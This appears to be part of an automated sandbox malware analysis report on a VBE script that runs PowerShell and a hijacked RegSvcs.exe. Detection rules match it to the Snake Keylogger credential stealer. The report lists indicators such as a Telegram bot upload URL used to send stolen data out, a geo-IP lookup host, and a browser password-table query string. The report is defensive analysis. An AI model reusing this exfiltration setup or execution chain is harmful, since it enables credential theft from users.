                Source: RegSvcs.exe, 0000000C.00000002.2951280494.000000000317D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.000000000317D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: RegSvcs.exe, 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187d
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187l
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889

                System Summary

                barindex
                Source: amsi64_1888.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0161826812_2_01618268
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0161AA6812_2_0161AA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0161EF8812_2_0161EF88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_016119B812_2_016119B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0161825912_2_01618259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0161E5E012_2_0161E5E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0161E5D012_2_0161E5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0161AA5812_2_0161AA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0161ED6812_2_0161ED68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01612DD112_2_01612DD1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0161F65812_2_0161F658
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0161FB0812_2_0161FB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0161FAF812_2_0161FAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF771012_2_05BF7710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF662812_2_05BF6628
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF5FD812_2_05BF5FD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF7A6812_2_05BF7A68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF049812_2_05BF0498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF048B12_2_05BF048B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF243812_2_05BF2438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF242812_2_05BF2428
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF37D812_2_05BF37D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF37C812_2_05BF37C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF173012_2_05BF1730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF172312_2_05BF1723
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF770012_2_05BF7700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF662212_2_05BF6622
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF313012_2_05BF3130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF314012_2_05BF3140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF000612_2_05BF0006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF004012_2_05BF0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF533212_2_05BF5332
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF534012_2_05BF5340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF42B912_2_05BF42B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF12D812_2_05BF12D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF42C812_2_05BF42C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF12C812_2_05BF12C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF2CE812_2_05BF2CE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF2CD912_2_05BF2CD9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF6C7012_2_05BF6C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF6C6012_2_05BF6C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF1FE012_2_05BF1FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF1FD112_2_05BF1FD1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF5FCC12_2_05BF5FCC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF0E8012_2_05BF0E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF0E7012_2_05BF0E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF598812_2_05BF5988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF597812_2_05BF5978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF289012_2_05BF2890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF288012_2_05BF2880
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF1B8812_2_05BF1B88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF1B7812_2_05BF1B78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF0A2812_2_05BF0A28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05BF0A1712_2_05BF0A17
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_06E34EC812_2_06E34EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_06E3326C12_2_06E3326C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_06E3BBAB12_2_06E3BBAB
                Source: amsi64_1888.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@16/19@3/4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_26550411
                Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uaqt2amc.jfd.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs"
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.00000000031DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7064" "2696" "2648" "2700" "0" "0" "2704" "0" "0" "0" "0" "0"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1888" "2588" "2776" "2068" "0" "0" "2076" "0" "0" "0" "0" "0"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7064" "2696" "2648" "2700" "0" "0" "2704" "0" "0" "0" "0" "0" Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1888" "2588" "2776" "2068" "0" "0" "2076" "0" "0" "0" "0" "0"
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
